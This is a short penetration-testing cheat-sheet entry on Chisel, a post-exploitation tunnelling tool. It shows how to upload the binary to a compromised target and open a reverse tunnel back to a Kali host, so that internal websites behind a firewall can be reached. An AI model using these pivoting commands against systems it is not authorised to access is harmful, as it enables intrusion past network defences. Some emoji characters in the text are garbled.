Chisel
Chisel (10.5k β) is a post-exploitation tool that can be used to remotely access a website using TCP. This can be useful to access website from your browser will a firewall is blocking connections.
On Kali, you can install it using:
$ sudo apt install chisel
On the remote target server, you need to get chisel
- Use
lscpu
to find which binary is appropriate - Download the appropriate binary here
- Unzip (
gunzip xxx.gz
) and upload it on the target
Example: From Kali - Access A Remote Internal Website
On Kali, the host, listen for clients:
$ chisel server -p cport --reverse
Listening at <chost_ip:cport>
On the target, assuming the website is running at localhost:80
, and we want to access it using localhost:8080
on Kali, we would use:
$ ./chisel client chost_ip:cport R:8080:localhost:80
If the website is running on another machine such as xxx.local:8000
, we can simply replace localhost
with an IP or a Domain Name:
$ ./chisel client chost_ip:cport R:8080:xxx.local:8000
π On your Kali machine, you will have to add an entry in your host file: 127.0.0.1 xxx.local
, and use http://xxx.local:8080
.
β οΈ Remember that you need to use the actual host IP in shells.